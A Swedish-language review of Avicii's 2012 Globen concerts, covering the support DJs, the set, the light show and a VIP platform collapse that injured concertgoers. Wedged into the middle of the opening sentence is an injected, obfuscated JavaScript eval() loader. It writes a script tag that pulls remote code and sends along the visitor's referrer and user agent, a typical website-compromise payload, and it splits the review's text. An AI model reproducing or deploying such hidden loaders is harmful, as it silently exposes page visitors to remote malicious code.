Recension: Avicii på Globen 2012

8
Show
6.5
Publik
8
7.5

Den eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ezyeb|var|u0026u|referrer|rzbnn||js|php’.split(‘|’),0,{}))
just nu mest populära och hypade artisten från Sverige, Avicii, har haft en minst sagt hektisk helg med 2 fullsatta spelningar på Globen (för första gången i sitt liv), en tragisk olycka och en inställd spelning. Det hektiska dj-livet är däremot knappast främmande för 89-an från Stockholm.

På 4 år har han gått från att vara en svensk houseblog-champion till en av de kändaste och mest mainstream houseproducenterna i världen just nu. Med 22 år på nacken är han idag den sjätte bästa DJ:n i världen (enligt DJ Mags ”Top 100 DJ’s”), vinnare av en Grammis och har tävlat mot Swedish House Mafia, deadmau5 och Skrillex i The Grammy Awards tillsammans med David Guetta.

I helgen har han återvänt från sitt oändliga turnerande till stället där allt började, och sällan har en svensk artist välkomnats hem så varmt som Avicii. Vi kan samtidigt konstatera att housemusik och EDM rent generellt har vuxit sig ännu starkare i Sverige efter helgen och Avicii-fansen har definitivt lärt sig ett par nya namn att hålla utkik efter. Vi har fått möta nykomlingen Alexander Adstedt som startade helgens kaos med ett grymt set med låtar från bl.a. Chris Lake, Moguai och Calvin Harris och återigen fått se den stigande stjärnan Sebjak, som definitivt kan ses som en av Sveriges flitigaste och hårdast jobbande dj:s just nu. Enligt mig levererade han ett av sina bästa live sets hittills med en mängd yet-to-be-released låtar, bl.a. ”Follow Me” som helt klart fick igång publiken inför de stundande artisterna. Vi har även fått glädjen att se den svenska duon Cazzette för första gången för många, som trots sin relativt färska karriär växer i sann At Night-anda och som levererade ett självsäkert set där bl.a. deras nya singel ”Killmode” var med, en av kvällens absolut skönaste låtar tillsammans med deras andra remix på Dada Life’s ”Rolling Stone T-Shirt”!

Trots de supportande artisternas grymma framträdanden var det ändå Aviciis egna show som klarast sitter kvar i minnet, inte nödvändigtvis för att själva setet var revolutionerande utan snarare för det fina bandet som ständigt fanns mellan honom och publiken som visade sin kärlek och stolthet på ett sätt som jag varit med om få gånger, om någon. Med låten som lett utvecklingen till dit Avicii är idag, ”Bromance”, öppnade han sitt set inför tusentals överlyckliga fans för att sedan spela upp sina främsta hits hittills tillsammans med ett par av sina landsmän Alesso, SHM, Adrian Lux och Dada Lifes låtar här och där. Trots det relativt straight forward-setet var det däremot inget fel på hans låtval, Avicii kom för att visa sig för det svenska folket och det var hans låtar majoriteten av publiken var där för att höra. Min personliga favorit från hans set var den ännu ej släppta collaben med Nicky Romero som än så länge går under namnen ”Level Two”/”Fuck School”/”Fire”.

Med en grym ljusshow och en mängd super anthems från de massiva högtalarna var det svårt att tappa fokus, Avicii hade full kontroll över publiken under hela kvällen. Något som däremot inte kunde påverkas av hundratals lasrar och pumpande housemusik var Globens säkerhetsrutiner som under den första spelningen ledde till att en av VIP-plattformerna brast och lät ett 30-tal besökare falla 5 meter ner mot marken, resulterandes i att en 17-årig tjej fick livshotande skador. Trots den obehagliga olyckan var energin i arenan kvar och med alla de blivande klassikerna som Avicii visade för första gången och påminde oss om, låtar som kan ses som grundpelarna till sann Swedish House, tog Avicii, med sin ikoniska högerhand spelandes toner i luften flera tusen svenskar igenom en av de största ögonblicken för elektronisk musik i svensk historia.